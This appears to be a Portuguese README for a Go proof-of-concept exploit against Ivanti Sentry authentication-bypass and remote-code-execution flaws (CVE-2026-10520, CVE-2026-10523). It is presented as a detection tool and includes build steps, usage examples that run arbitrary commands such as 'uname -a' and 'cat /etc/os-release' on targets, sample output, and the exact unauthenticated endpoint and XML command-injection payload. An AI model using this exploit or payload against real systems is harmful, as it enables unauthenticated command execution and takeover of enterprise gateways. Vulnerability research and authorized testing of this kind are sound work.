
Ferramenta de detecção de prova de conceito para vulnerabilidades de bypass de autenticação e execução remota de código no Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Envia requisições de API elaboradas para executar comandos do sistema e validar implantações vulneráveis.
Uma ferramenta de detecção abrangente de prova de conceito para testar vulnerabilidades do Ivanti Sentry relacionadas a bypass de autenticação e execução remota de código. Esta ferramenta identifica sistemas vulneráveis ao CVE-2026-10520 e CVE-2026-10523.
Este projeto foi projetado para detectar e validar se uma instância do Ivanti Sentry é vulnerável a falhas críticas de bypass de autenticação e execução remota de código. A ferramenta envia mensagens especialmente elaboradas através do endpoint da API do Ivanti Sentry para executar comandos do sistema e extrair os resultados, permitindo que pesquisadores de segurança e testadores de penetração identifiquem implantações vulneráveis.
Vulnerabilidade de bypass de autenticação no Ivanti Sentry que permite acesso não autenticado a endpoints de API restritos.
Vulnerabilidade de execução remota de código no Ivanti Sentry que permite a execução de comandos arbitrários do sistema através da API de mensagens quando combinada com o bypass de autenticação.
Clone o repositório e navegue até o diretório do projeto:
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry
Obtenha o init e a biblioteca de pacotes
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy
Compile o executável:
go build -o tot_poc tot_poc.go

A ferramenta requer dois parâmetros obrigatórios: URL de destino e comando a ser executado.

Execute um comando simples no alvo:
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"
-url (obrigatório): URL base do destino incluindo protocolo (ex.: https://127.0.0.1:8443)-cmd (obrigatório): Comando a ser executado para detecção de vulnerabilidade (ex.: "uname -a", "id", "whoami")-p ou -proxy (opcional): Endereço e porta do proxy para roteamento de tráfego (ex.: 127.0.0.1:8080)
Detecte vulnerabilidade com comando simples de informação do sistema:
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"
Execute com configuração de proxy:
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080
Execute comando para extrair informações do sistema:
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"
A ferramenta exibirá:
Target: https://192.168.1.100:8443
Command: uname -a
[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.
Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux
Target: https://192.168.1.100:8443
Command: uname -a
[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.
A ferramenta explora o endpoint /mics/api/v2/sentry/mics-config/handleMessage que é acessível sem autenticação. O payload é construído como:
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>
A resposta contém a saída do comando em formato XML dentro de uma tag de sucesso.
Esta ferramenta é fornecida apenas para fins autorizados de teste de segurança e pesquisa. Os usuários são os únicos responsáveis por garantir que possuem a devida autorização antes de testar qualquer sistema. O acesso não autorizado a sistemas de computador é ilegal. Os autores não assumem nenhuma responsabilidade por uso indevido ou danos causados por esta ferramenta.
GhostGTR666 - Gagaltotal666
Este projeto é fornecido como está para fins educacionais e de pesquisa em segurança.